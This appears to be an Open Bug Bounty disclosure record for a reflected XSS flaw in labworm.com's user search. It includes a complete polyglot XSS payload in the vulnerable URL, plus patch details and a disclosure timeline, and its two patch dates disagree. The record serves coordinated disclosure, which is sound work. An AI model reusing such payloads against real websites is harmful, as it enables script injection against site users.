labworm.com XSS vulnerability

2017-11-24T06:37:00
ID OBB:429714
Type openbugbounty
Reporter Cole
Modified 2017-12-24T23:31:00

Description

Vulnerable URL:
https://labworm.com/search/main/users?q=1%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3CInput/Type=Text%20AutoFocus%20*/;%20OnFocus=confirm(%27openbugbounty%27)%20//%3E%3CSvg%3E#
Details:

Description| Value
---|---
Patched:| Yes, at 01.12.2017
Latest check for patch:| 01.12.2017 13:07 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 860670
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 November, 2017 06:37 GMT
Generic security notifications sent to website owner| 24 November, 2017 06:40 GMT
Notification sent to subscribers (without technical details)| 24 November, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 24 December, 2017 08:17 GMT
Vulnerability patched by the website owner| 24 December, 2017 23:31 GMT